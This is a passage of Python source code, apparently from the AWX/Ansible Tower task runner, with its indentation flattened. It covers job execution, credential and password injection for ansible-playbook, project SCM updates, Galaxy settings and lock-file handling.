if self.instance.cancel_flag:
self.instance = self.update_model(self.instance.pk, status='canceled')
if self.instance.status != 'running':
# Stop the task chain and prevent starting the job if it has
# already been canceled.
self.instance = self.update_model(pk)
status = self.instance.status
raise RuntimeError('not starting %s task' % self.instance.status)
if not os.path.exists(settings.AWX_ISOLATION_BASE_PATH):
raise RuntimeError('AWX_ISOLATION_BASE_PATH=%s does not exist' % settings.AWX_ISOLATION_BASE_PATH)
# store a record of the venv used at runtime
if hasattr(self.instance, 'custom_virtualenv'):
self.update_model(pk, custom_virtualenv=getattr(self.instance, 'ansible_virtualenv_path', settings.ANSIBLE_VENV_PATH))
# Fetch "cached" fact data from prior runs and put on the disk
# where ansible expects to find it
if getattr(self.instance, 'use_fact_cache', False):
self.instance.start_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', str(self.instance.id), 'fact_cache'),
fact_modification_times,
)
# May have to serialize the value
private_data_files = self.build_private_data_files(self.instance, private_data_dir)
passwords = self.build_passwords(self.instance, kwargs)
self.build_extra_vars_file(self.instance, private_data_dir)
args = self.build_args(self.instance, private_data_dir, passwords)
env = self.build_env(self.instance, private_data_dir, private_data_files=private_data_files)
self.safe_env = build_safe_env(env)
credentials = self.build_credentials_list(self.instance)
for credential in credentials:
if credential:
credential.credential_type.inject_credential(credential, env, self.safe_cred_env, args, private_data_dir)
self.safe_env.update(self.safe_cred_env)
self.write_args_file(private_data_dir, args)
password_prompts = self.get_password_prompts(passwords)
expect_passwords = self.create_expect_passwords_data_struct(password_prompts, passwords)
params = {
'ident': self.instance.id,
'private_data_dir': private_data_dir,
'playbook': self.build_playbook_path_relative_to_cwd(self.instance, private_data_dir),
'inventory': self.build_inventory(self.instance, private_data_dir),
'passwords': expect_passwords,
'envvars': env,
'settings': {
'job_timeout': self.get_instance_timeout(self.instance),
'suppress_ansible_output': True,
},
}
if isinstance(self.instance, AdHocCommand):
params['module'] = self.build_module_name(self.instance)
params['module_args'] = self.build_module_args(self.instance)
if getattr(self.instance, 'use_fact_cache', False):
# Enable Ansible fact cache.
params['fact_cache_type'] = 'jsonfile'
else:
# Disable Ansible fact cache.
params['fact_cache_type'] = ''
if self.instance.is_container_group_task or settings.IS_K8S:
params['envvars'].pop('HOME', None)
'''
Delete parameters if the values are None or empty array
'''
for v in ['passwords', 'playbook', 'inventory']:
if not params[v]:
del params[v]
self.dispatcher = CallbackQueueDispatcher()
self.instance.log_lifecycle("running_playbook")
if isinstance(self.instance, SystemJob):
res = ansible_runner.interface.run(
project_dir=settings.BASE_DIR,
event_handler=self.event_handler,
finished_callback=self.finished_callback,
status_handler=self.status_handler,
**params,
)
else:
receptor_job = AWXReceptorJob(self, params)
self.unit_id = receptor_job.unit_id
res = receptor_job.run()
if not res:
return
status = res.status
rc = res.rc
if status == 'timeout':
self.instance.job_explanation = "Job terminated due to timeout"
status = 'failed'
extra_update_fields['job_explanation'] = self.instance.job_explanation
# ensure failure notification sends even if playbook_on_stats event is not triggered
handle_success_and_failure_notifications.apply_async([self.instance.job.id])
except InvalidVirtualenvError as e:
extra_update_fields['job_explanation'] = e.message
logger.error('{} {}'.format(self.instance.log_format, e.message))
except Exception:
# this could catch programming or file system errors
extra_update_fields['result_traceback'] = traceback.format_exc()
logger.exception('%s Exception occurred while running task', self.instance.log_format)
finally:
logger.debug('%s finished running, producing %s events.', self.instance.log_format, self.event_ct)
try:
self.post_run_hook(self.instance, status)
except PostRunError as exc:
if status == 'successful':
status = exc.status
extra_update_fields['job_explanation'] = exc.args[0]
if exc.tb:
extra_update_fields['result_traceback'] = exc.tb
except Exception:
logger.exception('{} Post run hook errored.'.format(self.instance.log_format))
self.instance = self.update_model(pk)
self.instance = self.update_model(pk, status=status, emitted_events=self.event_ct, **extra_update_fields)
try:
self.final_run_hook(self.instance, status, private_data_dir, fact_modification_times)
except Exception:
logger.exception('{} Final run hook errored.'.format(self.instance.log_format))
self.instance.websocket_emit_status(status)
if status != 'successful':
if status == 'canceled':
raise AwxTaskError.TaskCancel(self.instance, rc)
else:
raise AwxTaskError.TaskError(self.instance, rc)
@task(queue=get_local_queuename)
class RunJob(BaseTask):
"""
Run a job using ansible-playbook.
"""
model = Job
event_model = JobEvent
event_data_key = 'job_id'
def build_private_data(self, job, private_data_dir):
"""
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
private_data = {'credentials': {}}
for credential in job.credentials.prefetch_related('input_sources__source_credential').all():
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
if credential.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[credential] = credential.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, job, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user, sudo/su
and ansible-vault.
"""
passwords = super(RunJob, self).build_passwords(job, runtime_passwords)
cred = job.machine_credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password', 'vault_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
for cred in job.vault_credentials:
field = 'vault_password'
vault_id = cred.get_input('vault_id', default=None)
if vault_id:
field = 'vault_password.{}'.format(vault_id)
if field in passwords:
raise RuntimeError('multiple vault credentials were specified with --vault-id {}@prompt'.format(vault_id))
value = runtime_passwords.get(field, cred.get_input('vault_password', default=''))
if value not in ('', 'ASK'):
passwords[field] = value
'''
Only 1 value can be provided for a unique prompt string. Prefer ssh
key unlock over network key unlock.
'''
if 'ssh_key_unlock' not in passwords:
for cred in job.network_credentials:
if cred.inputs.get('ssh_key_unlock'):
passwords['ssh_key_unlock'] = runtime_passwords.get('ssh_key_unlock', cred.get_input('ssh_key_unlock', default=''))
break
return passwords
def build_env(self, job, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunJob, self).build_env(job, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Set environment variables needed for inventory and job event
# callbacks to work.
env['JOB_ID'] = str(job.pk)
env['INVENTORY_ID'] = str(job.inventory.pk)
if job.project:
env['PROJECT_REVISION'] = job.project.scm_revision
env['ANSIBLE_RETRY_FILES_ENABLED'] = "False"
env['MAX_EVENT_RES'] = str(settings.MAX_EVENT_RES_DATA)
if hasattr(settings, 'AWX_ANSIBLE_CALLBACK_PLUGINS') and settings.AWX_ANSIBLE_CALLBACK_PLUGINS:
env['ANSIBLE_CALLBACK_PLUGINS'] = ':'.join(settings.AWX_ANSIBLE_CALLBACK_PLUGINS)
env['AWX_HOST'] = settings.TOWER_URL_BASE
# Create a directory for ControlPath sockets that is unique to each job
cp_dir = os.path.join(private_data_dir, 'cp')
if not os.path.exists(cp_dir):
os.mkdir(cp_dir, 0o700)
# FIXME: more elegant way to manage this path in container
env['ANSIBLE_SSH_CONTROL_PATH_DIR'] = '/runner/cp'
# Set environment variables for cloud credentials.
cred_files = private_data_files.get('credentials', {})
for cloud_cred in job.cloud_credentials:
if cloud_cred and cloud_cred.credential_type.namespace == 'openstack' and cred_files.get(cloud_cred, ''):
env['OS_CLIENT_CONFIG_FILE'] = to_container_path(cred_files.get(cloud_cred, ''), private_data_dir)
for network_cred in job.network_credentials:
env['ANSIBLE_NET_USERNAME'] = network_cred.get_input('username', default='')
env['ANSIBLE_NET_PASSWORD'] = network_cred.get_input('password', default='')
ssh_keyfile = cred_files.get(network_cred, '')
if ssh_keyfile:
env['ANSIBLE_NET_SSH_KEYFILE'] = ssh_keyfile
authorize = network_cred.get_input('authorize', default=False)
env['ANSIBLE_NET_AUTHORIZE'] = str(int(authorize))
if authorize:
env['ANSIBLE_NET_AUTH_PASS'] = network_cred.get_input('authorize_password', default='')
path_vars = (
('ANSIBLE_COLLECTIONS_PATHS', 'collections_paths', 'requirements_collections', '~/.ansible/collections:/usr/share/ansible/collections'),
('ANSIBLE_ROLES_PATH', 'roles_path', 'requirements_roles', '~/.ansible/roles:/usr/share/ansible/roles:/etc/ansible/roles'),
)
config_values = read_ansible_config(job.project.get_project_path(), list(map(lambda x: x[1], path_vars)))
for env_key, config_setting, folder, default in path_vars:
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
paths = [os.path.join(CONTAINER_ROOT, folder)] + paths
env[env_key] = os.pathsep.join(paths)
return env
def build_args(self, job, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
creds = job.machine_credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible-playbook's default of using
# the current user.
ssh_username = ssh_username or 'root'
args = []
if job.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
if job.become_enabled:
args.append('--become')
if job.diff_mode:
args.append('--diff')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
# Support prompting for multiple vault passwords
for k, v in passwords.items():
if k.startswith('vault_password'):
if k == 'vault_password':
args.append('--ask-vault-pass')
else:
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
args.append('--vault-id')
args.append('{}@prompt'.format(vault_id))
if job.forks:
if settings.MAX_FORKS > 0 and job.forks > settings.MAX_FORKS:
logger.warning(f'Maximum number of forks ({settings.MAX_FORKS}) exceeded.')
args.append('--forks=%d' % settings.MAX_FORKS)
else:
args.append('--forks=%d' % job.forks)
if job.force_handlers:
args.append('--force-handlers')
if job.limit:
args.extend(['-l', job.limit])
if job.verbosity:
args.append('-%s' % ('v' * min(5, job.verbosity)))
if job.job_tags:
args.extend(['-t', job.job_tags])
if job.skip_tags:
args.append('--skip-tags=%s' % job.skip_tags)
if job.start_at_task:
args.append('--start-at-task=%s' % job.start_at_task)
return args
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return job.playbook
def build_extra_vars_file(self, job, private_data_dir):
# Define special extra_vars for AWX, combine with job.extra_vars.
extra_vars = job.awx_meta_vars()
if job.extra_vars_dict:
extra_vars.update(json.loads(job.decrypted_extra_vars()))
# By default, all extra vars disallow Jinja2 template usage for
# security reasons; top level key-values defined in JT.extra_vars, however,
# are allowed as "safe" (because they can only be set by users with
# higher levels of privilege - those that have the ability create and
# edit Job Templates)
safe_dict = {}
if job.job_template and settings.ALLOW_JINJA_IN_EXTRA_VARS == 'template':
safe_dict = job.job_template.extra_vars_dict
return self._write_extra_vars_file(private_data_dir, extra_vars, safe_dict)
def build_credentials_list(self, job):
return job.credentials.prefetch_related('input_sources__source_credential').all()
def get_password_prompts(self, passwords={}):
d = super(RunJob, self).get_password_prompts(passwords)
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
d[r'Vault password:\s*?$'] = 'vault_password'
for k, v in passwords.items():
if k.startswith('vault_password.'):
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
d[r'Vault password \({}\):\s*?$'.format(vault_id)] = k
return d
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunJob, self).build_execution_environment_params(instance, private_data_dir)
# If this has an insights agent and it is not already mounted then show it
insights_dir = os.path.dirname(settings.INSIGHTS_SYSTEM_ID_FILE)
if instance.use_fact_cache and os.path.exists(insights_dir):
logger.info('not parent of others')
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{insights_dir}:{insights_dir}:Z",
]
)
return params
def pre_run_hook(self, job, private_data_dir):
super(RunJob, self).pre_run_hook(job, private_data_dir)
if job.inventory is None:
error = _('Job could not start because it does not have a valid inventory.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.project is None:
error = _('Job could not start because it does not have a valid project.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.execution_environment is None:
error = _('Job could not start because no Execution Environment could be found.')
self.update_model(job.pk, status='error', job_explanation=error)
raise RuntimeError(error)
elif job.project.status in ('error', 'failed'):
msg = _('The project revision for this job template is unknown due to a failed update.')
job = self.update_model(job.pk, status='failed', job_explanation=msg)
raise RuntimeError(msg)
project_path = job.project.get_project_path(check_if_exists=False)
job_revision = job.project.scm_revision
sync_needs = []
source_update_tag = 'update_{}'.format(job.project.scm_type)
branch_override = bool(job.scm_branch and job.scm_branch != job.project.scm_branch)
if not job.project.scm_type:
pass # manual projects are not synced, user has responsibility for that
elif not os.path.exists(project_path):
logger.debug('Performing fresh clone of {} on this instance.'.format(job.project))
sync_needs.append(source_update_tag)
elif job.project.scm_type == 'git' and job.project.scm_revision and (not branch_override):
try:
git_repo = git.Repo(project_path)
if job_revision == git_repo.head.commit.hexsha:
logger.debug('Skipping project sync for {} because commit is locally available'.format(job.log_format))
else:
sync_needs.append(source_update_tag)
except (ValueError, BadGitName, git.exc.InvalidGitRepositoryError):
logger.debug('Needed commit for {} not in local source tree, will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
else:
logger.debug('Project not available locally, {} will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
has_cache = os.path.exists(os.path.join(job.project.get_cache_path(), job.project.cache_id))
# Galaxy requirements are not supported for manual projects
if job.project.scm_type and ((not has_cache) or branch_override):
sync_needs.extend(['install_roles', 'install_collections'])
if sync_needs:
pu_ig = job.instance_group
pu_en = job.execution_node
sync_metafields = dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
instance_group=pu_ig,
execution_node=pu_en,
celery_task_id=job.celery_task_id,
)
if branch_override:
sync_metafields['scm_branch'] = job.scm_branch
sync_metafields['scm_clean'] = True # to accomidate force pushes
if 'update_' not in sync_metafields['job_tags']:
sync_metafields['scm_revision'] = job_revision
local_project_sync = job.project.create_project_update(_eager_fields=sync_metafields)
# save the associated job before calling run() so that a
# cancel() call on the job can cancel the project update
job = self.update_model(job.pk, project_update=local_project_sync)
project_update_task = local_project_sync._get_task_class()
try:
# the job private_data_dir is passed so sync can download roles and collections there
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
job = self.update_model(job.pk, scm_revision=local_project_sync.scm_revision)
except Exception:
local_project_sync.refresh_from_db()
if local_project_sync.status != 'canceled':
job = self.update_model(
job.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
job.refresh_from_db()
if job.cancel_flag:
return
else:
# Case where a local sync is not needed, meaning that local tree is
# up-to-date with project, job is running project current version
if job_revision:
job = self.update_model(job.pk, scm_revision=job_revision)
# Project update does not copy the folder, so copy here
RunProjectUpdate.make_local_copy(job.project, private_data_dir, scm_revision=job_revision)
if job.inventory.kind == 'smart':
# cache smart inventory memberships so that the host_filter query is not
# ran inside of the event saving code
update_smart_memberships_for_inventory(job.inventory)
def final_run_hook(self, job, status, private_data_dir, fact_modification_times):
super(RunJob, self).final_run_hook(job, status, private_data_dir, fact_modification_times)
if not private_data_dir:
# If there's no private data dir, that means we didn't get into the
# actual `run()` call; this _usually_ means something failed in
# the pre_run_hook method
return
if job.use_fact_cache:
job.finish_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', 'fact_cache'),
fact_modification_times,
)
try:
inventory = job.inventory
except Inventory.DoesNotExist:
pass
else:
if inventory is not None:
update_inventory_computed_fields.delay(inventory.id)
@task(queue=get_local_queuename)
class RunProjectUpdate(BaseTask):
model = ProjectUpdate
event_model = ProjectUpdateEvent
event_data_key = 'project_update_id'
def __init__(self, *args, job_private_data_dir=None, **kwargs):
super(RunProjectUpdate, self).__init__(*args, **kwargs)
self.playbook_new_revision = None
self.original_branch = None
self.job_private_data_dir = job_private_data_dir
def event_handler(self, event_data):
super(RunProjectUpdate, self).event_handler(event_data)
returned_data = event_data.get('event_data', {})
if returned_data.get('task_action', '') == 'set_fact':
returned_facts = returned_data.get('res', {}).get('ansible_facts', {})
if 'scm_version' in returned_facts:
self.playbook_new_revision = returned_facts['scm_version']
def build_private_data(self, project_update, private_data_dir):
"""
Return SSH private key data needed for this project update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
"""
private_data = {'credentials': {}}
if project_update.credential:
credential = project_update.credential
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
return private_data
def build_passwords(self, project_update, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key unlock and SCM
username/password.
"""
passwords = super(RunProjectUpdate, self).build_passwords(project_update, runtime_passwords)
if project_update.credential:
passwords['scm_key_unlock'] = project_update.credential.get_input('ssh_key_unlock', default='')
passwords['scm_username'] = project_update.credential.get_input('username', default='')
passwords['scm_password'] = project_update.credential.get_input('password', default='')
return passwords
def build_env(self, project_update, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunProjectUpdate, self).build_env(project_update, private_data_dir, private_data_files=private_data_files)
env['ANSIBLE_RETRY_FILES_ENABLED'] = str(False)
env['ANSIBLE_ASK_PASS'] = str(False)
env['ANSIBLE_BECOME_ASK_PASS'] = str(False)
env['DISPLAY'] = '' # Prevent stupid password popup when running tests.
# give ansible a hint about the intended tmpdir to work around issues
# like https://github.com/ansible/ansible/issues/30064
env['TMP'] = settings.AWX_ISOLATION_BASE_PATH
env['PROJECT_UPDATE_ID'] = str(project_update.pk)
if settings.GALAXY_IGNORE_CERTS:
env['ANSIBLE_GALAXY_IGNORE'] = True
# build out env vars for Galaxy credentials (in order)
galaxy_server_list = []
if project_update.project.organization:
for i, cred in enumerate(project_update.project.organization.galaxy_credentials.all()):
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_URL'] = cred.get_input('url')
auth_url = cred.get_input('auth_url', default=None)
token = cred.get_input('token', default=None)
if token:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_TOKEN'] = token
if auth_url:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_AUTH_URL'] = auth_url
galaxy_server_list.append(f'server{i}')
if galaxy_server_list:
env['ANSIBLE_GALAXY_SERVER_LIST'] = ','.join(galaxy_server_list)
return env
def _build_scm_url_extra_vars(self, project_update):
"""
Helper method to build SCM url and extra vars with parameters needed
for authentication.
"""
extra_vars = {}
if project_update.credential:
scm_username = project_update.credential.get_input('username', default='')
scm_password = project_update.credential.get_input('password', default='')
else:
scm_username = ''
scm_password = ''
scm_type = project_update.scm_type
scm_url = update_scm_url(scm_type, project_update.scm_url, check_special_cases=False)
scm_url_parts = urlparse.urlsplit(scm_url)
# Prefer the username/password in the URL, if provided.
scm_username = scm_url_parts.username or scm_username
scm_password = scm_url_parts.password or scm_password
if scm_username:
if scm_type == 'svn':
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_password = False
if scm_url_parts.scheme != 'svn+ssh':
scm_username = False
elif scm_url_parts.scheme.endswith('ssh'):
scm_password = False
elif scm_type in ('insights', 'archive'):
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_url = update_scm_url(scm_type, scm_url, scm_username, scm_password, scp_format=True)
else:
scm_url = update_scm_url(scm_type, scm_url, scp_format=True)
# Pass the extra accept_hostkey parameter to the git module.
if scm_type == 'git' and scm_url_parts.scheme.endswith('ssh'):
extra_vars['scm_accept_hostkey'] = 'true'
return scm_url, extra_vars
def build_inventory(self, instance, private_data_dir):
return 'localhost,'
def build_args(self, project_update, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
args = []
if getattr(settings, 'PROJECT_UPDATE_VVV', False):
args.append('-vvv')
if project_update.job_tags:
args.extend(['-t', project_update.job_tags])
return args
def build_extra_vars_file(self, project_update, private_data_dir):
extra_vars = {}
scm_url, extra_vars_new = self._build_scm_url_extra_vars(project_update)
extra_vars.update(extra_vars_new)
scm_branch = project_update.scm_branch
if project_update.job_type == 'run' and (not project_update.branch_override):
if project_update.project.scm_revision:
scm_branch = project_update.project.scm_revision
elif not scm_branch:
raise RuntimeError('Could not determine a revision to run from project.')
elif not scm_branch:
scm_branch = 'HEAD'
galaxy_creds_are_defined = project_update.project.organization and project_update.project.organization.galaxy_credentials.exists()
if not galaxy_creds_are_defined and (settings.AWX_ROLES_ENABLED or settings.AWX_COLLECTIONS_ENABLED):
logger.warning('Galaxy role/collection syncing is enabled, but no ' f'credentials are configured for {project_update.project.organization}.')
extra_vars.update(
{
'projects_root': settings.PROJECTS_ROOT.rstrip('/'),
'local_path': os.path.basename(project_update.project.local_path),
'project_path': project_update.get_project_path(check_if_exists=False), # deprecated
'insights_url': settings.INSIGHTS_URL_BASE,
'awx_license_type': get_license().get('license_type', 'UNLICENSED'),
'awx_version': get_awx_version(),
'scm_url': scm_url,
'scm_branch': scm_branch,
'scm_clean': project_update.scm_clean,
'scm_track_submodules': project_update.scm_track_submodules,
'roles_enabled': galaxy_creds_are_defined and settings.AWX_ROLES_ENABLED,
'collections_enabled': galaxy_creds_are_defined and settings.AWX_COLLECTIONS_ENABLED,
}
)
# apply custom refspec from user for PR refs and the like
if project_update.scm_refspec:
extra_vars['scm_refspec'] = project_update.scm_refspec
elif project_update.project.allow_override:
# If branch is override-able, do extra fetch for all branches
extra_vars['scm_refspec'] = 'refs/heads/*:refs/remotes/origin/*'
if project_update.scm_type == 'archive':
# for raw archive, prevent error moving files between volumes
extra_vars['ansible_remote_tmp'] = os.path.join(project_update.get_project_path(check_if_exists=False), '.ansible_awx', 'tmp')
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_playbook_path_relative_to_cwd(self, project_update, private_data_dir):
return os.path.join('project_update.yml')
def get_password_prompts(self, passwords={}):
d = super(RunProjectUpdate, self).get_password_prompts(passwords)
d[r'Username for.*:\s*?$'] = 'scm_username'
d[r'Password for.*:\s*?$'] = 'scm_password'
d[r'Password:\s*?$'] = 'scm_password'
d[r'\S+?@\S+?\'s\s+?password:\s*?$'] = 'scm_password'
d[r'Enter passphrase for .*:\s*?$'] = 'scm_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
# FIXME: Configure whether we should auto accept host keys?
d[r'^Are you sure you want to continue connecting \(yes/no\)\?\s*?$'] = 'yes'
return d
def _update_dependent_inventories(self, project_update, dependent_inventory_sources):
scm_revision = project_update.project.scm_revision
inv_update_class = InventoryUpdate._get_task_class()
for inv_src in dependent_inventory_sources:
if not inv_src.update_on_project_update:
continue
if inv_src.scm_last_revision == scm_revision:
logger.debug('Skipping SCM inventory update for `{}` because ' 'project has not changed.'.format(inv_src.name))
continue
logger.debug('Local dependent inventory update for `{}`.'.format(inv_src.name))
with transaction.atomic():
if InventoryUpdate.objects.filter(inventory_source=inv_src, status__in=ACTIVE_STATES).exists():
logger.debug('Skipping SCM inventory update for `{}` because ' 'another update is already active.'.format(inv_src.name))
continue
local_inv_update = inv_src.create_inventory_update(
_eager_fields=dict(
launch_type='scm',
status='running',
instance_group=project_update.instance_group,
execution_node=project_update.execution_node,
source_project_update=project_update,
celery_task_id=project_update.celery_task_id,
)
)
try:
inv_update_class().run(local_inv_update.id)
except Exception:
logger.exception('{} Unhandled exception updating dependent SCM inventory sources.'.format(project_update.log_format))
try:
project_update.refresh_from_db()
except ProjectUpdate.DoesNotExist:
logger.warning('Project update deleted during updates of dependent SCM inventory sources.')
break
try:
local_inv_update.refresh_from_db()
except InventoryUpdate.DoesNotExist:
logger.warning('%s Dependent inventory update deleted during execution.', project_update.log_format)
continue
if project_update.cancel_flag:
logger.info('Project update {} was canceled while updating dependent inventories.'.format(project_update.log_format))
break
if local_inv_update.cancel_flag:
logger.info('Continuing to process project dependencies after {} was canceled'.format(local_inv_update.log_format))
if local_inv_update.status == 'successful':
inv_src.scm_last_revision = scm_revision
inv_src.save(update_fields=['scm_last_revision'])
def release_lock(self, instance):
try:
fcntl.lockf(self.lock_fd, fcntl.LOCK_UN)
except IOError as e:
logger.error("I/O error({0}) while trying to release lock file [{1}]: {2}".format(e.errno, instance.get_lock_file(), e.strerror))
os.close(self.lock_fd)
raise
os.close(self.lock_fd)
self.lock_fd = None
'''
Note: We don't support blocking=False
'''
def acquire_lock(self, instance, blocking=True):
lock_path = instance.get_lock_file()
if lock_path is None:
# If from migration or someone blanked local_path for any other reason, recoverable by save
instance.save()
lock_path = instance.get_lock_file()
if lock_path is None:
raise RuntimeError(u'Invalid lock file path')
try:
self.lock_fd = os.open(lock_path, os.O_RDWR | os.O_CREAT)
except OSError as e:
logger.error("I/O error({0}) while trying to open lock file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
start_time = time.time()
while True:
try:
instance.refresh_from_db(fields=['cancel_flag'])
if instance.cancel_flag:
logger.debug("ProjectUpdate({0}) was canceled".format(instance.pk))
return
fcntl.lockf(self.lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
break
except IOError as e:
if e.errno not in (errno.EAGAIN, errno.EACCES):
os.close(self.lock_fd)
logger.error("I/O error({0}) while trying to aquire lock on file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
else:
time.sleep(1.0)
waiting_time = time.time() - start_time
if waiting_time > 1.0:
logger.info('{} spent {} waiting to acquire lock for local source tree ' 'for path {}.'.format(instance.log_format, waiting_time, lock_path))
def pre_run_hook(self, instance, private_data_dir):
super(RunProjectUpdate, self).pre_run_hook(instance, private_data_dir)
# re-create root project folder if a natural disaster has destroyed it
if not os.path.exists(settings.PROJECTS_ROOT):
os.mkdir(settings.PROJECTS_ROOT)
project_path = instance.project.get_project_path(check_if_exists=False)
if not os.path.exists(project_path):
os.makedirs(project_path) # used as container mount
self.acquire_lock(instance)
self.original_branch = None
if instance.scm_type == 'git' and instance.branch_override:
if os.path.exists(project_path):
git_repo = git.Repo(project_path)
if git_repo.head.is_detached:
self.original_branch = git_repo.head.commit
else:
self.original_branch = git_repo.active_branch
stage_path = os.path.join(instance.get_cache_path(), 'stage')
if os.path.exists(stage_path):
logger.warning('{0} unexpectedly existed before update'.format(stage_path))
shutil.rmtree(stage_path)
os.makedirs(stage_path) # presence of empty cache indicates lack of roles or collections
# the project update playbook is not in a git repo, but uses a vendoring directory
# to be consistent with the ansible-runner model,
# that is moved into the runner project folder here
awx_playbooks = self.get_path_to('..', 'playbooks')
copy_tree(awx_playbooks, os.path.join(private_data_dir, 'project'))
@staticmethod
def clear_project_cache(cache_dir, keep_value):
if os.path.isdir(cache_dir):
for entry in os.listdir(cache_dir):
old_path = os.path.join(cache_dir, entry)
if entry not in (keep_value, 'stage'):
# invalidate, then delete
new_path = os.path.join(cache_dir, '.~~delete~~' + entry)
try:
os.rename(old_path, new_path)
shutil.rmtree(new_path)
except OSError:
logger.warning(f"Could not remove cache directory {old_path}")
@staticmethod
def make_local_copy(p, job_private_data_dir, scm_revision=None):
"""Copy project content (roles and collections) to a job private_data_dir
:param object p: Either a project or a project update
:param str job_private_data_dir: The root of the target ansible-runner folder
:param str scm_revision: For branch_override cases, the git revision to copy
"""
project_path = p.get_project_path(check_if_exists=False)
destination_folder = os.path.join(job_private_data_dir, 'project')
if not scm_revision:
scm_revision = p.scm_revision
if p.scm_type == 'git':
git_repo = git.Repo(project_path)
if not os.path.exists(destination_folder):
os.mkdir(destination_folder, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
tmp_branch_name = 'awx_internal/{}'.format(uuid4())
# always clone based on specific job revision
if not p.scm_revision:
raise RuntimeError('Unexpectedly could not determine a revision to run from project.')
source_branch = git_repo.create_head(tmp_branch_name, p.scm_revision)
# git clone must take file:// syntax for source repo or else options like depth will be ignored
source_as_uri = Path(project_path).as_uri()
git.Repo.clone_from(
source_as_uri,
destination_folder,
branch=source_branch,
depth=1,
single_branch=True, # shallow, do not copy full history
)
# submodules copied in loop because shallow copies from local HEADs are ideal
# and no git clone submodule options are compatible with minimum requirements
for submodule in git_repo.submodules:
subrepo_path = os.path.abspath(os.path.join(project_path, submodule.path))
subrepo_destination_folder = os.path.abspath(os.path.join(destination_folder, submodule.path))
subrepo_uri = Path(subrepo_path).as_uri()
git.Repo.clone_from(subrepo_uri, subrepo_destination_folder, depth=1, single_branch=True)
# force option is necessary because remote refs are not counted, although no information is lost
git_repo.delete_head(tmp_branch_name, force=True)
else:
copy_tree(project_path, destination_folder, preserve_symlinks=1)
# copy over the roles and collection cache to job folder
